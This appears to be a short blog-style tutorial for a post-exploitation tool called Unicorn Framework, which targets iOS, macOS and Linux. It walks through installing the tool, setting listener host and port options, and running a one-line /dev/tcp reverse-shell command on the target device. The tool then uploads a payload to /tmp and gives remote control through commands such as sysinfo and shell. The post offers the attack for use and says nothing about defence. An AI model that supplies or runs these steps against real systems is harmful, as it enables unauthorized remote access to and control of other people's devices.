Unicorn Framework (iOS, macOS, Linux Post-Exploitation)

Unicorn Framework is an iOS, macOS and Linux post-exploitation framework that using one line command and powerful python payload attempts to spawn a command line session with a lot of features such as downloading files, uploading files, getting system information and etc.

Lets begin our Unicorn Framework overview.

Download and Install Unicorn Framework

Download and install Unicorn Framework from official GitHub repository provided by EntySec:

> git clone https://github.com/EntySec/unicorn.git

> cd unicorn

> chmod +x install.sh

> ./install.sh

Execute Unicorn Framework

Lets execute it now to get main Unicorn interface:

> unicorn

Set Unicorn Framework Options

Set main options and run attack handler:

> set LHOST

> set LPORT

Start Attack and Payload Target

Final steps, execute one line command on target device:

> /bin/sh &> /dev/tcp// 0>&1

After this Unicorn Framework will upload its payload called Magic Unicorn to /tmp on target and execute it.

Enter help to get full list of available commands. As you can see on picture, I executed pid to get payload process ID, sysinfo to get system information, pwd to get current working directory, chdir / to change directory to / and shell ls -al to get directory contents.

Unicorn Framework now supports iOS, macOS and Linux systems.

Enjoy.